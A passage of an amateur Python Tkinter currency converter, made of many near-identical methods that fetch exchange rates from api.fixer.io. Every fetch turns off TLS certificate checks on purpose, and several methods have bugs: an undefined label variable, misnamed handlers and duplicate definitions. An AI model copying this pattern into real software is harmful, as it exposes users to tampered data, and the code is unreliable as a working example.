text=\"BRL: \")\n x20.place(x=250, y=265)\n out20 = Label(root)\n out20.config(text = '{:0.2f}'.format(val20))\n out20.place(x=380, y=265)\n\n self.again()\n\n def CAD_to_GBP(self):\n global user_value29\n user_ask29 = Label(root, text =\"How many Canadian dollars? \")\n user_ask29.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value29 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value29.place(x=370, y=225)\n\n calcButton29 = Button(self, text=\" Convert \", command=self.cal29)\n calcButton29.place(x=265, y=450)\n root.bind(\"\", self.linkCal29)\n def linkCal29(self, event=None):\n self.cal29()\n def cal29(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n gbp_rate = parsed[\"rates\"][\"GBP\"]\n\n val29= float(user_value29.get()) * (gbp_rate)\n int(val29)\n\n x29 = Label(root, text=\"GBP: \")\n x29.place(x=250, y=265)\n out29 = Label(root)\n out29.config(text = '{:0.2f}'.format(val29))\n out29.place(x=380, y=265)\n\n self.again()\n\n \n def USD_to_CAD(self):\n global user_value1\n user_ask1 = Label(root, text =\"How many US dollars? 
\")\n user_ask1.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value1 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value1.place(x=370, y=225)\n\n calcButton1 = Button(self, text=\" Convert \", command=self.cal1)\n calcButton1.place(x=265, y=450)\n root.bind(\"\", self.linkCal1)\n def linkCal1(self, event=None):\n self.cal1()\n def cal1(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n cad_rate = parsed[\"rates\"][\"CAD\"]\n\n val1= float(user_value1.get()) * (cad_rate)\n int(val1)\n\n x1 = Label(root, text=\"CAD: \")\n x1.place(x=250, y=265)\n out1 = Label(root)\n out1.config(text = '{:0.2f}'.format(val1))\n out1.place(x=380, y=265)\n\n self.again()\n \n def USD_to_EUR(self):\n global user_value4\n user_ask4 = Label(root, text =\"How many US Dollars? \")\n user_ask4.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value4 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value4.place(x=370, y=225)\n\n calcButton4 = Button(self, text=\" Convert \", command=self.cal4)\n calcButton4.place(x=265, y=450)\n root.bind(\"\", self.linkCal4)\n def linkCal4(self, event=None):\n self.cal4()\n def cal4(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n eur_rate = parsed[\"rates\"][\"EUR\"]\n\n val4= float(user_value4.get()) * (eur_rate)\n int(val4)\n\n x4 = Label(root, text=\"EUR: \")\n x4.place(x=250, y=265)\n out4 = Label(root)\n out4.config(text = '{:0.2f}'.format(val4))\n out4.place(x=380, y=265)\n\n self.again()\n \n def USD_to_INR(self):\n global user_value8\n user_ask8 = Label(root, text =\"How many US Dollars? \")\n user_ask8.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value8 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value8.place(x=370, y=225)\n\n calcButton8 = Button(self, text=\" Convert \", command=self.cal8)\n calcButton8.place(x=265, y=450)\n root.bind(\"\", self.linkCal8)\n def linkCal8(self, event=None):\n self.cal8()\n def cal8(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n inr_rate = parsed[\"rates\"][\"INR\"]\n\n val8= float(user_value8.get()) * (inr_rate)\n int(val8)\n\n x8 = Label(root, text=\"INR: \")\n x8.place(x=250, y=265)\n out8 = Label(root)\n out8.config(text = '{:0.2f}'.format(val8))\n out8.place(x=380, y=265)\n\n self.again()\n\n def USD_to_JPY(self):\n global user_value13\n user_ask13 = Label(root, text =\"How many US Dollars? 
\")\n user_ask13.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value13 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value13.place(x=370, y=225)\n\n calcButton13 = Button(self, text=\" Convert \", command=self.cal13)\n calcButton13.place(x=265, y=450)\n root.bind(\"\", self.linkCal13)\n def linkCal13(self, event=None):\n self.cal13()\n def cal13(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n jpy_rate = parsed[\"rates\"][\"JPY\"]\n\n val13= float(user_value13.get()) * (jpy_rate)\n int(val13)\n\n x13 = Label(root, text=\"JPY: \")\n x13.place(x=250, y=265)\n out13 = Label(root)\n out13.config(text = '{:0.2f}'.format(val13))\n out13.place(x=380, y=265)\n\n self.again()\n\n def USD_to_BRL(self):\n global user_value21\n user_ask21 = Label(root, text =\"How many US Dollars? \")\n user_ask21.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value21 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value21.place(x=370, y=225)\n\n calcButton21 = Button(self, text=\" Convert \", command=self.cal21)\n calcButton21.place(x=265, y=450)\n root.bind(\"\", self.linkCal21)\n def linkCal121(self, event=None):\n self.cal21()\n def cal21(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n brl_rate = parsed[\"rates\"][\"BRL\"]\n\n val21= float(user_value21.get()) * (brl_rate)\n int(val21)\n\n x21 = Label(root, text=\"BRL: \")\n x21.place(x=250, y=265)\n out21 = Label(root)\n out21.config(text = '{:0.2f}'.format(val21))\n out21.place(x=380, y=265)\n\n self.again()\n\n def USD_to_GBP(self):\n global user_value30\n user_ask30 = Label(root, text =\"How many US Dollars? \")\n user_ask30.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value30 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value30.place(x=370, y=225)\n\n calcButton30 = Button(self, text=\" Convert \", command=self.cal30)\n calcButton30.place(x=265, y=450)\n root.bind(\"\", self.linkCal30)\n def linkCal130(self, event=None):\n self.cal30()\n def cal30(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n gbp_rate = parsed[\"rates\"][\"GBP\"]\n\n val30= float(user_value30.get()) * (gbp_rate)\n int(val30)\n\n x30 = Label(root, text=\"GBP: \")\n x30.place(x=250, y=265)\n out30 = Label(root)\n out30.config(text = '{:0.2f}'.format(val30))\n out30.place(x=380, y=265)\n\n self.again()\n \n\n def EUR_to_CAD(self):\n global user_value3\n user_ask3 = Label(root, text =\"How many Euros? 
\")\n user_ask3.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value3 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value3.place(x=370, y=225)\n\n calcButton3 = Button(self, text=\" Convert \", command=self.cal3)\n calcButton3.place(x=265, y=450)\n root.bind(\"\", self.linkCal3)\n def linkCal3(self, event=None):\n self.cal3()\n def cal3(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n cad_rate = parsed[\"rates\"][\"CAD\"]\n\n val3= float(user_value3.get()) * (cad_rate)\n int(val3)\n\n x3 = Label(root, text=\"CAD: \")\n x3.place(x=250, y=265)\n out3 = Label(root)\n out3.config(text = '{:0.2f}'.format(val3))\n out3.place(x=380, y=265)\n\n self.again()\n\n def EUR_to_USD(self):\n global user_value5\n user_ask5 = Label(root, text =\"How many Euros? \")\n user_ask5.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value5 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value5.place(x=370, y=225)\n\n calcButton5 = Button(self, text=\" Convert \", command=self.cal5)\n calcButton5.place(x=265, y=450)\n root.bind(\"\", self.linkCal5)\n def linkCal5(self, event=None):\n self.cal5()\n def cal5(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n usd_rate = parsed[\"rates\"][\"USD\"]\n\n val5= float(user_value5.get()) * (usd_rate)\n int(val5)\n\n x5 = Label(root, text=\"USD: \")\n x5.place(x=250, y=265)\n out5 = Label(root)\n out5.config(text = '{:0.2f}'.format(val5))\n out5.place(x=380, y=265)\n\n self.again()\n\n def EUR_to_INR(self):\n global user_value9\n user_ask9 = Label(root, text =\"How many Euros? \")\n user_ask9.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value9 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value9.place(x=370, y=225)\n\n calcButton9 = Button(self, text=\" Convert \", command=self.cal9)\n calcButton9.place(x=265, y=450)\n root.bind(\"\", self.linkCal9)\n def linkCal9(self, event=None):\n self.cal9()\n def cal9(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n inr_rate = parsed[\"rates\"][\"INR\"]\n\n val9= float(user_value9.get()) * (inr_rate)\n int(val9)\n\n x9 = Label(root, text=\"INR: \")\n x9.place(x=250, y=265)\n out9 = Label(root)\n out9.config(text = '{:0.2f}'.format(val9))\n out9.place(x=380, y=265)\n\n self.again()\n\n def EUR_to_JPY(self):\n global user_value14\n user_ask14 = Label(root, text =\"How many Euros? 
\")\n user_ask14.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value14 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value14.place(x=370, y=225)\n\n calcButton14 = Button(self, text=\" Convert \", command=self.cal14)\n calcButton14.place(x=265, y=450)\n root.bind(\"\", self.linkCal14)\n def linkCal14(self, event=None):\n self.cal14()\n def cal14(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n jpy_rate = parsed[\"rates\"][\"JPY\"]\n\n val14= float(user_value14.get()) * (jpy_rate)\n int(val14)\n\n x14 = Label(root, text=\"JPY: \")\n x14.place(x=250, y=265)\n out14 = Label(root)\n out14.config(text = '{:0.2f}'.format(val14))\n out14.place(x=380, y=265)\n\n self.again()\n\n def EUR_to_BRL(self):\n global user_value21\n user_ask21 = Label(root, text =\"How many Euros? \")\n user_ask21.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value21 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value21.place(x=370, y=225)\n\n calcButton21 = Button(self, text=\" Convert \", command=self.cal21)\n calcButton21.place(x=265, y=450)\n root.bind(\"\", self.linkCal21)\n def linkCal21(self, event=None):\n self.cal21()\n def cal21(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n brl_rate = parsed[\"rates\"][\"BRL\"]\n\n val21= float(user_value21.get()) * (brl_rate)\n int(val21)\n\n x21 = Label(root, text=\"BRL: \")\n x21.place(x=250, y=265)\n out21 = Label(root)\n out21.config(text = '{:0.2f}'.format(val21))\n out21.place(x=380, y=265)\n\n self.again()\n\n def EUR_to_GBP(self):\n global user_value31\n user_ask31 = Label(root, text =\"How many Euros? \")\n user_ask31.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value31 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value31.place(x=370, y=225)\n\n calcButton31 = Button(self, text=\" Convert \", command=self.cal31)\n calcButton31.place(x=265, y=450)\n root.bind(\"\", self.linkCal31)\n def linkCal131(self, event=None):\n self.cal31()\n def cal31(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n gbp_rate = parsed[\"rates\"][\"GBP\"]\n\n val31= float(user_value31.get()) * (gbp_rate)\n int(val31)\n\n x31 = Label(root, text=\"GBP: \")\n x31.place(x=250, y=265)\n out31 = Label(root)\n out31.config(text = '{:0.2f}'.format(val31))\n out31.place(x=380, y=265)\n\n self.again()\n \n \n def INR_to_CAD(self):\n global user_value7\n user_ask7 = Label(root, text =\"How many Indian Rs? 
\")\n user_ask7.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value7 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value7.place(x=370, y=225)\n\n calcButton7 = Button(self, text=\" Convert \", command=self.cal7)\n calcButton7.place(x=265, y=450)\n root.bind(\"\", self.linkCal7)\n def linkCal7(self, event=None):\n self.cal7()\n def cal7(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n cad_rate = parsed[\"rates\"][\"CAD\"]\n\n val7= float(user_value7.get()) * (cad_rate)\n int(val7)\n\n x7 = Label(root, text=\"CAD: \")\n x7.place(x=250, y=265)\n out7 = Label(root)\n out7.config(text = '{:0.2f}'.format(val7))\n out7.place(x=380, y=265)\n\n self.again()\n\n def INR_to_USD(self):\n global user_value10\n user_ask10 = Label(root, text =\"How many Indian Rs? \")\n user_ask10.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value10 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value10.place(x=370, y=225)\n\n calcButton10 = Button(self, text=\" Convert \", command=self.cal10)\n calcButton10.place(x=265, y=450)\n root.bind(\"\", self.linkCal10)\n def linkCal10(self, event=None):\n self.cal10()\n def cal10(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n usd_rate = parsed[\"rates\"][\"USD\"]\n\n val10= float(user_value10.get()) * (usd_rate)\n int(val10)\n\n x10 = Label(root, text=\"USD: \")\n x10.place(x=250, y=265)\n out10 = Label(root)\n out10.config(text = '{:0.2f}'.format(val10))\n out10.place(x=380, y=265)\n\n self.again()\n\n def INR_to_EUR(self):\n global user_value11\n user_ask11 = Label(root, text =\"How many Indian Rs? \")\n user_ask11.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value11 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value11.place(x=370, y=225)\n\n calcButton11 = Button(self, text=\" Convert \", command=self.cal11)\n calcButton11.place(x=265, y=450)\n root.bind(\"\", self.linkCal11)\n def linkCal11(self, event=None):\n self.cal11()\n def cal11(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n eur_rate = parsed[\"rates\"][\"EUR\"]\n\n val11= float(user_value11.get()) * (eur_rate)\n int(val11)\n\n x11 = Label(root, text=\"EUR: \")\n x11.place(x=250, y=265)\n out11 = Label(root)\n out11.config(text = '{:0.2f}'.format(val11))\n out11.place(x=380, y=265)\n\n self.again()\n\n def INR_to_JPY(self):\n global user_value15\n user_ask15 = Label(root, text =\"How many Indian Rs? 
\")\n user_ask15.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value15 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value15.place(x=370, y=225)\n\n calcButton15 = Button(self, text=\" Convert \", command=self.cal15)\n calcButton15.place(x=265, y=450)\n root.bind(\"\", self.linkCal15)\n def linkCal15(self, event=None):\n self.cal15()\n def cal15(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n jpy_rate = parsed[\"rates\"][\"JPY\"]\n\n val15= float(user_value15.get()) * (jpy_rate)\n int(val15)\n\n x15 = Label(root, text=\"JPY: \")\n x15.place(x=250, y=265)\n out15 = Label(root)\n out15.config(text = '{:0.2f}'.format(val15))\n out15.place(x=380, y=265)\n\n self.again()\n\n def INR_to_BRL(self):\n global user_value22\n user_ask2 = Label(root, text =\"How many Indian Rs? \")\n user_ask22.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value22 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value22.place(x=370, y=225)\n\n calcButton22 = Button(self, text=\" Convert \", command=self.cal22)\n calcButton22.place(x=265, y=450)\n root.bind(\"\", self.linkCal22)\n def linkCal22(self, event=None):\n self.cal22()\n def cal22(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n brl_rate = parsed[\"rates\"][\"BRL\"]\n\n val22= float(user_value22.get()) * (brl_rate)\n int(val22)\n\n x22 = Label(root, text=\"BRL: \")\n x22.place(x=250, y=265)\n out22 = Label(root)\n out22.config(text = '{:0.2f}'.format(val22))\n out22.place(x=380, y=265)\n\n self.again()\n\n def INR_to_GBP(self):\n global user_value32\n user_ask32 = Label(root, text =\"How many Indian Rs? \")\n user_ask32.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value32 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value32.place(x=370, y=225)\n\n calcButton32 = Button(self, text=\" Convert \", command=self.cal32)\n calcButton32.place(x=265, y=450)\n root.bind(\"\", self.linkCal32)\n def linkCal32(self, event=None):\n self.cal32()\n def cal32(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n gbp_rate = parsed[\"rates\"][\"GBP\"]\n\n val32= float(user_value32.get()) * (gbp_rate)\n int(val32)\n\n x32 = Label(root, text=\"GBP: \")\n x32.place(x=250, y=265)\n out32 = Label(root)\n out32.config(text = '{:0.2f}'.format(val32))\n out32.place(x=380, y=265)\n\n self.again()\n \n\n def JPY_to_CAD(self):\n global user_value16\n user_ask16 = Label(root, text =\"How many Japanese Yen? 
\")\n user_ask16.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value16 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value16.place(x=370, y=225)\n\n calcButton16 = Button(self, text=\" Convert \", command=self.cal16)\n calcButton16.place(x=265, y=450)\n root.bind(\"\", self.linkCal16)\n def linkCal16(self, event=None):\n self.cal16()\n def cal16(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n cad_rate = parsed[\"rates\"][\"CAD\"]\n\n val16= float(user_value16.get()) * (cad_rate)\n int(val16)\n\n x16 = Label(root, text=\"CAD: \")\n x16.place(x=250, y=265)\n out16 = Label(root)\n out16.config(text = '{:0.2f}'.format(val16))\n out16.place(x=380, y=265)\n\n self.again()\n\n def JPY_to_USD(self):\n global user_value17\n user_ask17 = Label(root, text =\"How many Japanese Yen? \")\n user_ask17.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value17 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value17.place(x=370, y=225)\n\n calcButton17 = Button(self, text=\" Convert \", command=self.cal17)\n calcButton17.place(x=265, y=450)\n root.bind(\"\", self.linkCal17)\n def linkCal17(self, event=None):\n self.cal17()\n def cal17(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n usd_rate = parsed[\"rates\"][\"USD\"]\n\n val17= float(user_value17.get()) * (usd_rate)\n int(val17)\n\n x17 = Label(root, text=\"USD: \")\n x17.place(x=250, y=265)\n out17 = Label(root)\n out17.config(text = '{:0.2f}'.format(val17))\n out17.place(x=380, y=265)\n\n self.again()\n\n def JPY_to_EUR(self):\n global user_value18\n user_ask18 = Label(root, text =\"How many Japanese Yen? \")\n user_ask18.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value18 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value18.place(x=370, y=225)\n\n calcButton18 = Button(self, text=\" Convert \", command=self.cal18)\n calcButton18.place(x=265, y=450)\n root.bind(\"\", self.linkCal18)\n def linkCal18(self, event=None):\n self.cal18()\n def cal18(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n eur_rate = parsed[\"rates\"][\"EUR\"]\n\n val18= float(user_value18.get()) * (eur_rate)\n int(val18)\n\n x18 = Label(root, text=\"EUR: \")\n x18.place(x=250, y=265)\n out18 = Label(root)\n out18.config(text = '{:0.2f}'.format(val18))\n out18.place(x=380, y=265)\n\n self.again()\n\n def JPY_to_INR(self):\n global user_value19\n user_ask19 = Label(root, text =\"How many Japanese Yen? 
\")\n user_ask19.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value19 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value19.place(x=370, y=225)\n\n calcButton19 = Button(self, text=\" Convert \", command=self.cal19)\n calcButton19.place(x=265, y=450)\n root.bind(\"\", self.linkCal19)\n def linkCal19(self, event=None):\n self.cal19()\n def cal19(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n inr_rate = parsed[\"rates\"][\"INR\"]\n\n val19= float(user_value19.get()) * (inr_rate)\n int(val19)\n\n x19 = Label(root, text=\"INR: \")\n x19.place(x=250, y=265)\n out19 = Label(root)\n out19.config(text = '{:0.2f}'.format(val19))\n out19.place(x=380, y=265)\n\n self.again()\n\n def JPY_to_BRL(self):\n global user_value23\n user_ask23 = Label(root, text =\"How many Japanese Yen? \")\n user_ask23.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value23 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value23.place(x=370, y=225)\n\n calcButton23 = Button(self, text=\" Convert \", command=self.cal23)\n calcButton23.place(x=265, y=450)\n root.bind(\"\", self.linkCal23)\n def linkCal23(self, event=None):\n self.cal23()\n def cal23(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n brl_rate = parsed[\"rates\"][\"BRL\"]\n\n val23= float(user_value23.get()) * (brl_rate)\n int(val23)\n\n x23 = Label(root, text=\"BRL: \")\n x23.place(x=250, y=265)\n out23 = Label(root)\n out23.config(text = '{:0.2f}'.format(val23))\n out23.place(x=380, y=265)\n\n self.again()\n\n def JPY_to_GBP(self):\n global user_value33\n user_ask33 = Label(root, text =\"How many Japanese Yen? \")\n user_ask33.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value33 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value33.place(x=370, y=225)\n\n calcButton33 = Button(self, text=\" Convert \", command=self.cal33)\n calcButton33.place(x=265, y=450)\n root.bind(\"\", self.linkCal33)\n def linkCal33(self, event=None):\n self.cal33()\n def cal33(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n gbp_rate = parsed[\"rates\"][\"GBP\"]\n\n val33= float(user_value33.get()) * (gbp_rate)\n int(val33)\n\n x33 = Label(root, text=\"GBP: \")\n x33.place(x=250, y=265)\n out33 = Label(root)\n out33.config(text = '{:0.2f}'.format(val33))\n out33.place(x=380, y=265)\n\n self.again()\n \n\n def BRL_to_CAD(self):\n global user_value24\n user_ask24 = Label(root, text =\"How many Brazilian Reals? 
\")\n        user_ask24.place(x=130, y= 225)\n        vcmd = root.register(self.validate)\n        user_value24 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n        user_value24.place(x=370, y=225)\n\n        calcButton24 = Button(self, text=\" Convert \", command=self.cal24)\n        calcButton24.place(x=265, y=450)\n        root.bind(\"\", self.linkCal24)\n    def linkCal24(self, event=None):\n        self.cal24()\n    def cal24(self):\n        context = ssl._create_unverified_context() #allow for unverified link\n        fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n        data = fixerdata.read().decode('utf-8') #Read link\n        parsed = json.loads(data)\n        date = parsed[\"date\"] #import date\n        rates = parsed[\"rates\"] #import rates\n        cad_rate = parsed[\"rates\"][\"CAD\"]\n\n        val24= float(user_value24.get()) * (cad_rate)\n        int(val24)\n\n        x24 = Label(root, text=\"CAD: \")\n        x24.place(x=250, y=265)\n        out24 = Label(root)\n        out24.config(text = '{:0.2f}'.format(val24))\n        out24.place(x=380, y=265)\n\n        self.again()\n\n    def BRL_to_USD(self):\n        global user_value25\n        user_ask25 = Label(root, text =\"How many Brazilian Reals? \")\n        user_ask25.place(x=130, y= 225)\n        vcmd = root.register(self.validate)\n        user_value25 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n        user_value25.place(x=370, y=225)\n\n        calcButton25 = Button(self, text=\" Convert \", command=self.cal25)\n        calcButton25.place(x=265, y=450)\n        root.bind(\"\", self.linkCal25)\n    def linkCal25(self, event=None):\n        self.cal25()\n    def cal25(self):\n        context = ssl._create_unverified_context() #allow for unverified link\n        fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n        data = fixerdata.read().decode('utf-8') #Read link\n        parsed = json.loads(data)\n        date = parsed[\"date\"] #import date\n        rates = parsed[\"rates\"] #import rates\n        usd_rate = parsed[\"rates\"][\"USD\"]\n\n        val25= float(user_value25.get()) * (usd_rate)\n        int(val25)\n\n        x25 = Label(root, text=\"USD: \")\n        x25.place(x=250, y=265)\n        out25 = Label(root)\n        out25.config(text = '{:0.2f}'.format(val25))\n        out25.place(x=380, 